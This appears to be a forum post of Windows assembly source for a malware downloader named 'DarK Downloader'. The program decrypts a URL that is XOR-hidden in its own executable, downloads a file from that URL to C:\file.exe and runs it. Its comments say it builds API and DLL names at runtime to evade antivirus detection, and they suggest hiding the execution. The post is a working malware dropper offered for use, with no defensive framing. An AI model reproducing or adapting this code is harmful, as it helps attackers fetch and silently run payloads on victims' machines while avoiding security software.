[+]Topic: Code
[+]Von: ringwrath-4
[+]Return: Code
;DarK Downloader by ringwrath-4
;Compile using fasmw (Flat Assembler for Windows) - www.flatassembler.net
include '%include%/WIN32AX.INC' ;include extended Win32 API
.data ;start .data section
_dlstr db "C:\file.exe",0 ;local file location
UrlDownload rd 18 ;reserve 18 bytes for URLDownloadToFileA API
dllurl rd 10 ;reserve 10 bytes for urlmon.dll
self rb 256d ;reserve 256 bytes for Path of the .exe
fBuffer rb 256d ;reserve 256 bytes for buffering the URL
dllhandle rd 1 ;reserve a dword for dllhandle
DownloadFile rd 1 ;reserve another dword for the API Address
myfile rd 1 ;reserve dword for file handle
fsize rd 1 ;reserve dword for filesize
fpointer rd 1 ;reserve dword for filepointer
bread dd 0 ;put a 0 into bread for bytes read...
nullstr db '',0 ;empty string for ShellExecute
.code
main:
;-------------------------------------------------Fill dllurl (filling because antivirus programs detect 'URLMON.DLL' in the executable file, if we write the string at runtime its not in the executable
mov dword [dllurl], 'U4LM' ;and cant be detected by AV's that easy)
mov dword [dllurl+4d], 'ON.D'
mov word [dllurl+8d], 'LL'
mov byte [dllurl+1d], 'R'
;------------------------------------------------Get DLL Handle
push dllurl ;Push dllurl = 'URLMON.DLL' onto stack
call [LoadLibraryA] ;call API LoadLibraryA to load URLMON.DLL
mov [dllhandle],eax ;move the result into dllhandle
;------------------------------------------------ Fill UrlDownload (same thing as above with urlmon.dll)
mov dword [UrlDownload], 'UROD'
mov dword [UrlDownload+4d], 'ownl'
mov dword [UrlDownload+8d], 'oadT'
mov dword [UrlDownload+12d], 'oGil'
mov word [UrlDownload+16d], 'eA'
mov byte [UrlDownload+2d], 'L'
mov byte [UrlDownload+13d], 'F'
;-------------------------------------------------Get API Address
push UrlDownload ;push UrlDownload = 'URLDownloadToFileA' onto stack
push [dllhandle] ;push dllhandle onto stack
call [GetProcAddress] ;GetProcAddress to get the procedure address of URLDownloadToFileA
mov [DownloadFile],eax ;move the result into DownloadFile
;-------------------------------------------------Get settings of builded .exe
;-------------------------------------------------Get File path and name
push 256d ;push 256d onto stack, so the api will know we only have 256 bytes for the filename (256 bytes is much!)
push self ;push buffer of 256 bytes onto stack
push 0 ;push 0 onto stack
call [GetModuleFileNameA] ;Gives out the filename into buffer 'self'
;--------------------------------------------------Open File and read buffer
push 0 ;push 0 onto stack
push 0 ;push 0 onto stack
push OPEN_EXISTING ;push OPEN_EXISTING onto stack, so the file will be opened and not created
push 0 ;push 0 onto stack
push 0 ;push 0 onto stack
push GENERIC_READ ;push GENERIC_READ onto stack because we only want to read the file
push self ;push name of the .exe onto stack
call [CreateFile] ;Opens the file with parameters on stack
mov [myfile],eax ;move the result (file handle) from eax to myfile
push 0 ;push a 0 onto stack
push [myfile] ;pushes filehandle 'myfile' onto stack
call [GetFileSize] ;gets the filesize
mov [fsize],eax ;move result from eax to fsize
sub [fsize], 2560 ;substract 2560 of filesize to get the length of URL
push FILE_BEGIN ;push FILE_BEGIN onto stack, it symbolizes to Set the new FilePointer to 2560 like 2 lines under this
push 0 ;push 0 onto stack...
push 2560 ;push 2560 onto stack, this is the filesize of .exe if unmodified
push [myfile] ;push filehandle onto stack
call [SetFilePointer] ;call api SetFilePointer to set the file pointer on 2560
mov [fpointer],eax ;move eax to fpointer (we dont need this though)
push 0 ;push 0 onto stack
push bread ;push 'bytesread' onto stack
push [fsize] ;push filesize onto stack
push fBuffer ;push filebuffer onto stack
push [myfile] ;push filehandle onto stack
call [ReadFile] ;reads the URL out of file
push [myfile] ;push filehandle onto stack
call [CloseHandle] ;Close Filehandle 'myfile'
;-------------------------------------------------decrypt urlstr
push fBuffer ;push fBuffer (your URL) onto the stack
call [lstrlenA] ;call the api lstrlenA, it gives out the length of our URL
mov ecx, eax ;move the length of the URL into ecx
sub ecx, 1 ;substract 1 from the length, this is because we dont want to have a NULL char at the end of our URL
mov ebx, 0 ;move a 0 into ebx
xor byte [fBuffer] , 12d ;xor the first character of the URL (decrypt)
sd: ;this is a loop marker
inc ebx ;increment register ebx, so we have the address to next character in the URL
xor byte [fBuffer+ebx] , 12d ;xor that char
cmp ebx, ecx ;compare both registers, the length of the buffer and the incremented counter
jne sd ;if its not equal jmp back to sd, our loop marker
pop ebx
pop ecx
pop eax
;--------------------------------------------------download file
push 0 ;push a 0 onto the stack
push 0 ;another one...
push _dlstr ;push _dlstr = yourfile onto the stack
push fBuffer ;push _urlstr = yourfile onto the stack
push 0 ;push another 0 onto the stack
call [DownloadFile] ;calls the API URLDownloadToFileA - this will download the file
;-------------------------------------------------Open file (execute)
push SW_SHOWNORMAL ;push SW_SHOWNORMAL constant onto the stack, use SW_HIDE to hide the execution of your file
push nullstr ;push the empty string onto stack
push nullstr ;push another empty string onto stack
push _dlstr ;push the local location of your file onto the stack
push nullstr ;push another empty string onto stack
push HWND_DESKTOP ;use HWND_DESKTOP as the parent handle of the executed file
call [ShellExecuteA] ;call ShellExecuteA API to open/execute your file
;--------------------------------------------------end program
push 0 ;push 0 onto the stack
call [ExitProcess] ;should explain itself ^^
.end main ;end procedure main
Package: DarK-Downloader